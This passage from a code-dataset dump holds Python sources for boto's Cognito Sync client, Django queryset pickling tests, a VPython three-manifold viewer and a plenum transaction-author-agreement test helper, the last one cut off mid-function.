repo_name (string, 5-100 chars) | path (string, 4-375 chars) | copies (string, 991 classes) | size (string, 4-7 chars) | content (string, 666 chars-1M) | license (string, 15 classes)
---|---|---|---|---|---
ekalosak/boto | boto/cognito/sync/layer1.py | 135 | 21122 |
# Copyright (c) 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.compat import json
from boto.exception import JSONResponseError
from boto.connection import AWSAuthConnection
from boto.regioninfo import RegionInfo
from boto.cognito.sync import exceptions
class CognitoSyncConnection(AWSAuthConnection):
"""
Amazon Cognito Sync
Amazon Cognito Sync provides an AWS service and client library
that enable cross-device syncing of application-related user data.
High-level client libraries are available for both iOS and
Android. You can use these libraries to persist data locally so
that it's available even if the device is offline. Developer
credentials don't need to be stored on the mobile device to access
the service. You can use Amazon Cognito to obtain a normalized
user ID and credentials. User data is persisted in a dataset that
can store up to 1 MB of key-value pairs, and you can have up to 20
datasets per user identity.
With Amazon Cognito Sync, the data stored for each identity is
accessible only to credentials assigned to that identity. In order
to use the Cognito Sync service, you need to make API calls using
credentials retrieved with `Amazon Cognito Identity service`_.
"""
APIVersion = "2014-06-30"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "cognito-sync.us-east-1.amazonaws.com"
ResponseError = JSONResponseError
_faults = {
"LimitExceededException": exceptions.LimitExceededException,
"ResourceConflictException": exceptions.ResourceConflictException,
"InvalidConfigurationException": exceptions.InvalidConfigurationException,
"TooManyRequestsException": exceptions.TooManyRequestsException,
"InvalidParameterException": exceptions.InvalidParameterException,
"ResourceNotFoundException": exceptions.ResourceNotFoundException,
"InternalErrorException": exceptions.InternalErrorException,
"NotAuthorizedException": exceptions.NotAuthorizedException,
}
def __init__(self, **kwargs):
region = kwargs.get('region')
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
else:
del kwargs['region']
kwargs['host'] = region.endpoint
super(CognitoSyncConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def delete_dataset(self, identity_pool_id, identity_id, dataset_name):
"""
Deletes the specific dataset. The dataset will be deleted
permanently, and the action can't be undone. Datasets that
this dataset was merged with will no longer report the merge.
Any subsequent operation on this dataset will result in a
ResourceNotFoundException.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type dataset_name: string
:param dataset_name: A string of up to 128 characters. Allowed
characters are a-z, A-Z, 0-9, '_' (underscore), '-' (dash), and '.'
(dot).
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}'.format(
identity_pool_id, identity_id, dataset_name)
return self.make_request('DELETE', uri, expected_status=200)
def describe_dataset(self, identity_pool_id, identity_id, dataset_name):
"""
Gets metadata about a dataset by identity and dataset name.
The credentials used to make this API call need to have access
to the identity data. With Amazon Cognito Sync, each identity
has access only to its own data. You should use Amazon Cognito
Identity service to retrieve the credentials necessary to make
this API call.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type dataset_name: string
:param dataset_name: A string of up to 128 characters. Allowed
characters are a-z, A-Z, 0-9, '_' (underscore), '-' (dash), and '.'
(dot).
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}'.format(
identity_pool_id, identity_id, dataset_name)
return self.make_request('GET', uri, expected_status=200)
def describe_identity_pool_usage(self, identity_pool_id):
"""
Gets usage details (for example, data storage) about a
particular identity pool.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
"""
uri = '/identitypools/{0}'.format(identity_pool_id)
return self.make_request('GET', uri, expected_status=200)
def describe_identity_usage(self, identity_pool_id, identity_id):
"""
Gets usage information for an identity, including number of
datasets and data usage.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
"""
uri = '/identitypools/{0}/identities/{1}'.format(
identity_pool_id, identity_id)
return self.make_request('GET', uri, expected_status=200)
def get_identity_pool_configuration(self, identity_pool_id):
"""
Gets the configuration settings of an identity pool.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. This is the ID of the pool for which to return a
configuration.
"""
uri = '/identitypools/{0}/configuration'.format(identity_pool_id)
return self.make_request('GET', uri, expected_status=200)
def list_datasets(self, identity_pool_id, identity_id, next_token=None,
max_results=None):
"""
Lists datasets for an identity. The credentials used to make
this API call need to have access to the identity data. With
Amazon Cognito Sync, each identity has access only to its own
data. You should use Amazon Cognito Identity service to
retrieve the credentials necessary to make this API call.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type next_token: string
:param next_token: A pagination token for obtaining the next page of
results.
:type max_results: integer
:param max_results: The maximum number of results to be returned.
"""
uri = '/identitypools/{0}/identities/{1}/datasets'.format(
identity_pool_id, identity_id)
params = {}
headers = {}
query_params = {}
if next_token is not None:
query_params['nextToken'] = next_token
if max_results is not None:
query_params['maxResults'] = max_results
return self.make_request('GET', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def list_identity_pool_usage(self, next_token=None, max_results=None):
"""
Gets a list of identity pools registered with Cognito.
:type next_token: string
:param next_token: A pagination token for obtaining the next page of
results.
:type max_results: integer
:param max_results: The maximum number of results to be returned.
"""
uri = '/identitypools'
params = {}
headers = {}
query_params = {}
if next_token is not None:
query_params['nextToken'] = next_token
if max_results is not None:
query_params['maxResults'] = max_results
return self.make_request('GET', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def list_records(self, identity_pool_id, identity_id, dataset_name,
last_sync_count=None, next_token=None, max_results=None,
sync_session_token=None):
"""
Gets paginated records, optionally changed after a particular
sync count for a dataset and identity. The credentials used to
make this API call need to have access to the identity data.
With Amazon Cognito Sync, each identity has access only to its
own data. You should use Amazon Cognito Identity service to
retrieve the credentials necessary to make this API call.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type dataset_name: string
:param dataset_name: A string of up to 128 characters. Allowed
characters are a-z, A-Z, 0-9, '_' (underscore), '-' (dash), and '.'
(dot).
:type last_sync_count: long
:param last_sync_count: The last server sync count for this record.
:type next_token: string
:param next_token: A pagination token for obtaining the next page of
results.
:type max_results: integer
:param max_results: The maximum number of results to be returned.
:type sync_session_token: string
:param sync_session_token: A token containing a session ID, identity
ID, and expiration.
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}/records'.format(
identity_pool_id, identity_id, dataset_name)
params = {}
headers = {}
query_params = {}
if last_sync_count is not None:
query_params['lastSyncCount'] = last_sync_count
if next_token is not None:
query_params['nextToken'] = next_token
if max_results is not None:
query_params['maxResults'] = max_results
if sync_session_token is not None:
query_params['syncSessionToken'] = sync_session_token
return self.make_request('GET', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def register_device(self, identity_pool_id, identity_id, platform, token):
"""
Registers a device to receive push sync notifications.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. Here, the ID of the pool that the identity belongs to.
:type identity_id: string
:param identity_id: The unique ID for this identity.
:type platform: string
:param platform: The SNS platform type (e.g. GCM, SDM, APNS,
APNS_SANDBOX).
:type token: string
:param token: The push token.
"""
uri = '/identitypools/{0}/identity/{1}/device'.format(
identity_pool_id, identity_id)
params = {'Platform': platform, 'Token': token, }
headers = {}
query_params = {}
return self.make_request('POST', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def set_identity_pool_configuration(self, identity_pool_id,
push_sync=None):
"""
Sets the necessary configuration for push sync.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. This is the ID of the pool to modify.
:type push_sync: dict
:param push_sync: Configuration options to be applied to the identity
pool.
"""
uri = '/identitypools/{0}/configuration'.format(identity_pool_id)
params = {}
headers = {}
query_params = {}
if push_sync is not None:
params['PushSync'] = push_sync
return self.make_request('POST', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def subscribe_to_dataset(self, identity_pool_id, identity_id,
dataset_name, device_id):
"""
Subscribes to receive notifications when a dataset is modified
by another device.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. The ID of the pool to which the identity belongs.
:type identity_id: string
:param identity_id: Unique ID for this identity.
:type dataset_name: string
:param dataset_name: The name of the dataset to subscribe to.
:type device_id: string
:param device_id: The unique ID generated for this device by Cognito.
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}/subscriptions/{3}'.format(
identity_pool_id, identity_id, dataset_name, device_id)
return self.make_request('POST', uri, expected_status=200)
def unsubscribe_from_dataset(self, identity_pool_id, identity_id,
dataset_name, device_id):
"""
Unsubscribes from receiving notifications when a dataset is
modified by another device.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. The ID of the pool to which this identity belongs.
:type identity_id: string
:param identity_id: Unique ID for this identity.
:type dataset_name: string
:param dataset_name: The name of the dataset from which to unsubscribe.
:type device_id: string
:param device_id: The unique ID generated for this device by Cognito.
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}/subscriptions/{3}'.format(
identity_pool_id, identity_id, dataset_name, device_id)
return self.make_request('DELETE', uri, expected_status=200)
def update_records(self, identity_pool_id, identity_id, dataset_name,
sync_session_token, device_id=None,
record_patches=None, client_context=None):
"""
Posts updates to records, and adds and deletes records for a
dataset and user. The credentials used to make this API call
need to have access to the identity data. With Amazon Cognito
Sync, each identity has access only to its own data. You
should use Amazon Cognito Identity service to retrieve the
credentials necessary to make this API call.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type dataset_name: string
:param dataset_name: A string of up to 128 characters. Allowed
characters are a-z, A-Z, 0-9, '_' (underscore), '-' (dash), and '.'
(dot).
:type device_id: string
:param device_id: The unique ID generated for this device by Cognito.
:type record_patches: list
:param record_patches: A list of patch operations.
:type sync_session_token: string
:param sync_session_token: The SyncSessionToken returned by a previous
call to ListRecords for this dataset and identity.
:type client_context: string
:param client_context: Intended to supply a device ID that will
populate the `lastModifiedBy` field referenced in other methods.
The `ClientContext` field is not yet implemented.
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}'.format(
identity_pool_id, identity_id, dataset_name)
params = {'SyncSessionToken': sync_session_token, }
headers = {}
query_params = {}
if device_id is not None:
params['DeviceId'] = device_id
if record_patches is not None:
params['RecordPatches'] = record_patches
if client_context is not None:
headers['x-amz-Client-Context'] = client_context
return self.make_request('POST', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def make_request(self, verb, resource, headers=None, data='',
expected_status=None, params=None):
if headers is None:
headers = {}
response = AWSAuthConnection.make_request(
self, verb, resource, headers=headers, data=data, params=params)
body = json.loads(response.read().decode('utf-8'))
if response.status == expected_status:
return body
else:
error_type = response.getheader('x-amzn-ErrorType').split(':')[0]
error_class = self._faults.get(error_type, self.ResponseError)
raise error_class(response.status, response.reason, body)
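# --- Illustrative usage (not part of the original module): a minimal sketch of
# how this connection class might be driven. The credentials and the pool /
# identity / dataset identifiers below are placeholders, and the calls hit the
# live service, so treat this as documentation rather than something to run
# verbatim.
def _example_usage():
    conn = CognitoSyncConnection(
        aws_access_key_id='AKIA...EXAMPLE',          # placeholder credential
        aws_secret_access_key='EXAMPLE-SECRET-KEY')  # placeholder credential
    # Region defaults to us-east-1 (see DefaultRegionEndpoint above).
    pools = conn.list_identity_pool_usage(max_results=10)
    records = conn.list_records(
        'us-east-1:EXAMPLE-POOL-ID',      # identity_pool_id (placeholder)
        'us-east-1:EXAMPLE-IDENTITY-ID',  # identity_id (placeholder)
        'example_dataset',                # dataset_name (placeholder)
        max_results=25)
    return pools, records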
| mit |
rsvip/Django | tests/queryset_pickle/tests.py | 42 | 6189 |
from __future__ import unicode_literals
import datetime
import pickle
import warnings
from django.test import TestCase
from django.utils.encoding import force_text
from django.utils.version import get_version
from .models import Container, Event, Group, Happening, M2MModel
class PickleabilityTestCase(TestCase):
def setUp(self):
Happening.objects.create() # make sure the defaults are working (#20158)
def assert_pickles(self, qs):
self.assertEqual(list(pickle.loads(pickle.dumps(qs))), list(qs))
def test_related_field(self):
g = Group.objects.create(name="Ponies Who Own Maybachs")
self.assert_pickles(Event.objects.filter(group=g.id))
def test_datetime_callable_default_all(self):
self.assert_pickles(Happening.objects.all())
def test_datetime_callable_default_filter(self):
self.assert_pickles(Happening.objects.filter(when=datetime.datetime.now()))
def test_lambda_as_default(self):
self.assert_pickles(Happening.objects.filter(name="test"))
def test_standalone_method_as_default(self):
self.assert_pickles(Happening.objects.filter(number1=1))
def test_staticmethod_as_default(self):
self.assert_pickles(Happening.objects.filter(number2=1))
def test_classmethod_as_default(self):
self.assert_pickles(Happening.objects.filter(number3=1))
def test_membermethod_as_default(self):
self.assert_pickles(Happening.objects.filter(number4=1))
def test_filter_reverse_fk(self):
self.assert_pickles(Group.objects.filter(event=1))
def test_doesnotexist_exception(self):
# Ticket #17776
original = Event.DoesNotExist("Doesn't exist")
unpickled = pickle.loads(pickle.dumps(original))
# Exceptions are not equal to equivalent instances of themselves, so
# can't just use assertEqual(original, unpickled)
self.assertEqual(original.__class__, unpickled.__class__)
self.assertEqual(original.args, unpickled.args)
def test_manager_pickle(self):
pickle.loads(pickle.dumps(Happening.objects))
def test_model_pickle(self):
"""
Test that a model not defined on module level is pickleable.
"""
original = Container.SomeModel(pk=1)
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
# Also, deferred dynamic model works
Container.SomeModel.objects.create(somefield=1)
original = Container.SomeModel.objects.defer('somefield')[0]
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
self.assertEqual(original.somefield, reloaded.somefield)
def test_model_pickle_m2m(self):
"""
Test that the automatically created through model is pickleable.
"""
m1 = M2MModel.objects.create()
g1 = Group.objects.create(name='foof')
m1.groups.add(g1)
m2m_through = M2MModel._meta.get_field('groups').remote_field.through
original = m2m_through.objects.get()
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
def test_model_pickle_dynamic(self):
class Meta:
proxy = True
dynclass = type(str("DynamicEventSubclass"), (Event, ),
{'Meta': Meta, '__module__': Event.__module__})
original = dynclass(pk=1)
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
self.assertIs(reloaded.__class__, dynclass)
def test_specialized_queryset(self):
self.assert_pickles(Happening.objects.values('name'))
self.assert_pickles(Happening.objects.values('name').dates('when', 'year'))
# With related field (#14515)
self.assert_pickles(
Event.objects.select_related('group').order_by('title').values_list('title', 'group__name')
)
def test_pickle_prefetch_related_idempotence(self):
g = Group.objects.create(name='foo')
groups = Group.objects.prefetch_related('event_set')
# First pickling
groups = pickle.loads(pickle.dumps(groups))
self.assertQuerysetEqual(groups, [g], lambda x: x)
# Second pickling
groups = pickle.loads(pickle.dumps(groups))
self.assertQuerysetEqual(groups, [g], lambda x: x)
def test_pickle_prefetch_related_with_m2m_and_objects_deletion(self):
"""
#24831 -- Cached properties on ManyToOneRel created in QuerySet.delete()
caused subsequent QuerySet pickling to fail.
"""
g = Group.objects.create(name='foo')
m2m = M2MModel.objects.create()
m2m.groups.add(g)
Group.objects.all().delete()
m2ms = M2MModel.objects.prefetch_related('groups')
m2ms = pickle.loads(pickle.dumps(m2ms))
self.assertQuerysetEqual(m2ms, [m2m], lambda x: x)
def test_missing_django_version_unpickling(self):
"""
#21430 -- Verifies a warning is raised for querysets that are
unpickled without a Django version
"""
qs = Group.missing_django_version_objects.all()
with warnings.catch_warnings(record=True) as recorded:
pickle.loads(pickle.dumps(qs))
msg = force_text(recorded.pop().message)
self.assertEqual(msg,
"Pickled queryset instance's Django version is not specified.")
def test_unsupported_unpickle(self):
"""
#21430 -- Verifies a warning is raised for querysets that are
unpickled with a different Django version than the current one.
"""
qs = Group.previous_django_version_objects.all()
with warnings.catch_warnings(record=True) as recorded:
pickle.loads(pickle.dumps(qs))
msg = force_text(recorded.pop().message)
self.assertEqual(
msg,
"Pickled queryset instance's Django version 1.0 does not "
"match the current version %s." % get_version()
)
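# --- Illustrative only (not part of the original test module): the round trip
# every assert_pickles() call above performs. Pickling a QuerySet serializes
# its query; unpickling rebuilds the QuerySet, and evaluating it re-runs the
# query against the database.
def _pickle_roundtrip_sketch():
    qs = Group.objects.filter(name__startswith="Ponies")
    restored = pickle.loads(pickle.dumps(qs))
    return list(restored) == list(qs)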
| bsd-3-clause |
udrg/kalibr | aslam_nonparametric_estimation/bsplines/interp_rotation/threeManifoldVisual/__init__.py | 5 | 4470 |
import visual
import thread
import time
import numpy
class Manifold :
class SceneObject(object) :
def __init__(self, visual):
self._visual = visual
def setOpacity(self, opacity):
self._visual.opacity = opacity
def setRadius(self, radius):
self._visual.radius = radius
class point(SceneObject) :
def __init__(self, pos, color, manifold):
self.__pos = pos
super(self.__class__, self).__init__(visual.sphere(radius = 0.1, pos = manifold.getCurrentPosVec(pos), color = color, display = manifold.display))
self._visual.point = self
self.__manifold = manifold
def __str__(self):
return str(self.__pos)
def setPos(self, pos):
self.__pos = pos
self.updatePos()
def updatePos(self):
self._visual.pos = self.__manifold.getCurrentPosVec(self.__pos)
class curve(SceneObject) :
def __init__(self, points, color, manifold):
self.__points = points
super(self.__class__, self).__init__(visual.curve(radius = 0.01, pos = [manifold.getCurrentPosVec(pos) for pos in points], color = color, display = manifold.display))
self.__manifold = manifold
def setPos(self, points):
self.__points = points
self.updatePos()
def updatePos(self):
self._visual.pos = [self.__manifold.getCurrentPosVec(pos) for pos in self.__points]
def __init__(self, startpos, geometry, title="threemanifoldView"):
self.display = visual.display(title = title)
self.objects = []
self.__currentpos = startpos
self.__geometry = geometry
self.__stepsize = 0.25
def addPoint(self, pos, color = visual.color.white):
p = Manifold.point(pos, color, self)
self.objects.append(p)
return p
def addCurve(self, points, color = visual.color.white):
p = Manifold.curve(points, color, self)
self.objects.append(p)
return p
def setZeroPointEnabled(self, enabled):
try:
self.__zeroPointSphere.hidden = enabled
except:
if enabled :
self.__zeroPointSphere = visual.sphere(radius = 0.1, opacity = 0.5)
def getCurrentPosVec(self, pos):
return self.__geometry.log(self.__currentpos, pos)
def getCurrentVecPos(self, vec):
return self.__geometry.exp(self.__currentpos, vec)
def setCurrentPos(self, pos):
self.__currentpos = pos
for p in self.objects :
p.updatePos()
# print self.__currentpos
def __interactionThread(self):
while True :
if self.display.kb.keys: # event waiting to be processed?
s = self.display.kb.getkey() # get keyboard info
handler = self.__keyHandler.get(s)
if handler:
handler()
else:
print "'" + s + "'"
print self.__keyHandler
elif self.display.mouse.events:
ev = self.display.mouse.getevent()
if ev.press :
try :
p = ev.pick.point
print p
except :
pass
else:
time.sleep(0.01)
def __step(self, vec):
self.setCurrentPos(self.getCurrentVecPos(numpy.array(vec) * self.__stepsize))
def getKeyHandler(self):
return self.__keyHandler
def setKeyHandler(self, handler):
self.__keyHandler = handler
def startInteractionThread(self):
try :
return self.__thread
except :
self.__keyHandler = {
"left" : lambda : self.__step((-1, 0, 0)),
"right" : lambda : self.__step((1, 0, 0)),
"page up" : lambda : self.__step((0, 1, 0)),
"page down" : lambda : self.__step((0, -1, 0)),
"up" : lambda : self.__step((0, 0, 1)),
"down" : lambda : self.__step((0, 0, -1)),
}
self.__thread = thread.start_new_thread(self.__interactionThread, ())
return self.__thread
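# --- Illustrative sketch (not part of the original module): a trivial flat
# "geometry" whose log/exp maps are plain vector subtraction and addition,
# which is enough to drive the Manifold viewer above. The VPython 'visual'
# package must be installed for the display window to open.
class _FlatGeometry(object):
    def log(self, base, pos):
        return numpy.array(pos) - numpy.array(base)
    def exp(self, base, vec):
        return numpy.array(base) + numpy.array(vec)

def _example_view():
    m = Manifold((0.0, 0.0, 0.0), _FlatGeometry(), title="flat example")
    m.addPoint((1.0, 0.0, 0.0), color=visual.color.red)
    m.addCurve([(0.0, 0.0, 0.0), (1.0, 1.0, 0.0)])
    m.startInteractionThread()
    return m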
| bsd-3-clause |
evernym/zeno | plenum/test/txn_author_agreement/helper.py | 2 | 8887 |
import base64
import json
from _sha256 import sha256
import base58
from indy.ledger import build_txn_author_agreement_request, build_get_txn_author_agreement_request, \
build_get_acceptance_mechanisms_request, build_disable_all_txn_author_agreements_request
from typing import NamedTuple, Dict, Optional
from plenum.common.constants import CONFIG_LEDGER_ID, STATE_PROOF, ROOT_HASH, PROOF_NODES, MULTI_SIGNATURE, \
MULTI_SIGNATURE_PARTICIPANTS, MULTI_SIGNATURE_SIGNATURE, MULTI_SIGNATURE_VALUE, MULTI_SIGNATURE_VALUE_LEDGER_ID, \
MULTI_SIGNATURE_VALUE_STATE_ROOT, MULTI_SIGNATURE_VALUE_TXN_ROOT, MULTI_SIGNATURE_VALUE_POOL_STATE_ROOT, \
MULTI_SIGNATURE_VALUE_TIMESTAMP, TXN_AUTHOR_AGREEMENT_TEXT, TXN_AUTHOR_AGREEMENT_VERSION, \
AML_VERSION, AML, AML_CONTEXT, GET_TXN_AUTHOR_AGREEMENT_DIGEST, GET_TXN_AUTHOR_AGREEMENT_VERSION, \
OP_FIELD_NAME, DATA, TXN_TIME, REPLY, \
TXN_METADATA, TXN_METADATA_SEQ_NO, TXN_METADATA_TIME, GET_TXN_AUTHOR_AGREEMENT_AML_VERSION, \
GET_TXN_AUTHOR_AGREEMENT_AML_TIMESTAMP, TXN_AUTHOR_AGREEMENT_AML, TXN_AUTHOR_AGREEMENT_RETIREMENT_TS, TXN_TYPE, \
TXN_AUTHOR_AGREEMENT, TXN_AUTHOR_AGREEMENT_DIGEST, TXN_AUTHOR_AGREEMENT_RATIFICATION_TS, TXN_AUTHOR_AGREEMENT_DISABLE
from plenum.common.types import f
from plenum.common.util import randomString
from plenum.server.request_handlers.static_taa_helper import StaticTAAHelper
from plenum.server.request_handlers.txn_author_agreement_aml_handler import TxnAuthorAgreementAmlHandler
from plenum.server.request_managers.write_request_manager import WriteRequestManager
from plenum.test.helper import sdk_sign_and_submit_req, sdk_get_and_check_replies, sdk_sign_and_submit_op
from state.pruning_state import PruningState
TaaData = NamedTuple("TaaData", [
("text", str),
("version", str),
("seq_no", int),
("txn_time", int),
("digest", str)
])
TaaAmlData = NamedTuple("TaaAmlData", [
("version", str),
("aml", dict),
("amlContext", str),
("seq_no", int),
("txn_time", int)
])
def sdk_send_txn_author_agreement(looper, sdk_pool_handle, sdk_wallet, version: str,
text: Optional[str] = None,
ratified: Optional[int] = None,
retired: Optional[int] = None):
req = looper.loop.run_until_complete(build_txn_author_agreement_request(sdk_wallet[1], text, version,
ratified, retired))
rep = sdk_sign_and_submit_req(sdk_pool_handle, sdk_wallet, req)
return sdk_get_and_check_replies(looper, [rep])[0]
def sdk_send_txn_author_agreement_disable(looper, sdk_pool_handle, sdk_wallet):
req = looper.loop.run_until_complete(build_disable_all_txn_author_agreements_request(sdk_wallet[1]))
rep = sdk_sign_and_submit_req(sdk_pool_handle, sdk_wallet, req)
return sdk_get_and_check_replies(looper, [rep])[0]
def set_txn_author_agreement(
looper, sdk_pool_handle, sdk_wallet, text: str, version: str, ratified: int, retired: Optional[int]
) -> TaaData:
reply = sdk_send_txn_author_agreement(looper, sdk_pool_handle, sdk_wallet, version, text,
ratified=ratified, retired=retired)[1]
assert reply[OP_FIELD_NAME] == REPLY
result = reply[f.RESULT.nm]
return TaaData(
text, version,
seq_no=result[TXN_METADATA][TXN_METADATA_SEQ_NO],
txn_time=result[TXN_METADATA][TXN_METADATA_TIME],
# TODO: Add ratified?
digest=StaticTAAHelper.taa_digest(text, version)
)
def sdk_get_txn_author_agreement(looper, sdk_pool_handle, sdk_wallet,
digest: Optional[str] = None,
version: Optional[str] = None,
timestamp: Optional[int] = None):
params = {}
if digest is not None:
params[GET_TXN_AUTHOR_AGREEMENT_DIGEST] = digest
if version is not None:
params[GET_TXN_AUTHOR_AGREEMENT_VERSION] = version
if timestamp is not None:
params['timestamp'] = timestamp
req = looper.loop.run_until_complete(build_get_txn_author_agreement_request(sdk_wallet[1], json.dumps(params)))
rep = sdk_sign_and_submit_req(sdk_pool_handle, sdk_wallet, req)
return sdk_get_and_check_replies(looper, [rep])[0]
def sdk_get_taa_aml(looper, sdk_pool_handle, sdk_wallet,
version: Optional[str] = None,
timestamp: Optional[int] = None):
req = looper.loop.run_until_complete(build_get_acceptance_mechanisms_request(sdk_wallet[1], timestamp, version))
rep = sdk_sign_and_submit_req(sdk_pool_handle, sdk_wallet, req)
return sdk_get_and_check_replies(looper, [rep])[0]
def get_txn_author_agreement(
looper, sdk_pool_handle, sdk_wallet,
digest: Optional[str] = None,
version: Optional[str] = None,
timestamp: Optional[int] = None
) -> TaaData:
reply = sdk_get_txn_author_agreement(
looper, sdk_pool_handle, sdk_wallet,
digest=digest, version=version, timestamp=timestamp
)[1]
assert reply[OP_FIELD_NAME] == REPLY
result = reply[f.RESULT.nm]
return None if result[DATA] is None else TaaData(
text=result[DATA][TXN_AUTHOR_AGREEMENT_TEXT],
version=result[DATA][TXN_AUTHOR_AGREEMENT_VERSION],
seq_no=result[f.SEQ_NO.nm],
txn_time=result[TXN_TIME],
digest=result[DATA][TXN_AUTHOR_AGREEMENT_DIGEST]
)
def get_aml_req_handler(node):
aml_req_handler = node.write_manager.request_handlers[TXN_AUTHOR_AGREEMENT_AML][0]
assert isinstance(aml_req_handler, TxnAuthorAgreementAmlHandler)
return aml_req_handler
def taa_digest(text: str, version: str) -> str:
return sha256('{}{}'.format(version, text).encode()).hexdigest()
def check_state_proof(result, expected_key: Optional = None, expected_value: Optional = None):
# TODO: This was copy-pasted from indy node (and extended); probably there should be a better place for it
assert STATE_PROOF in result
state_proof = result[STATE_PROOF]
assert ROOT_HASH in state_proof
assert state_proof[ROOT_HASH]
assert PROOF_NODES in state_proof
assert state_proof[PROOF_NODES]
assert MULTI_SIGNATURE in state_proof
multi_sig = state_proof[MULTI_SIGNATURE]
assert multi_sig
assert multi_sig[MULTI_SIGNATURE_PARTICIPANTS]
assert multi_sig[MULTI_SIGNATURE_SIGNATURE]
assert MULTI_SIGNATURE_VALUE in multi_sig
multi_sig_value = multi_sig[MULTI_SIGNATURE_VALUE]
assert MULTI_SIGNATURE_VALUE_LEDGER_ID in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_LEDGER_ID]
assert MULTI_SIGNATURE_VALUE_STATE_ROOT in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_STATE_ROOT]
assert MULTI_SIGNATURE_VALUE_TXN_ROOT in multi_sig_value
